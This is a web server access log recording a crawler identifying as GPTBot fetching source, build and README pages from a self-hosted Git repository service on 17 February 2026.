"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10169] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" -[17/Feb/2026:16:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11570] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" -[17/Feb/2026:16:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21358] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21065] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21357] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10710] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10710] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11079] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13576] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83218] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" -[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169612] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12123] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20103] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:21:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 16095] [Gzip 9.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14449] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12528] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12500] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:12 +0000] - 200 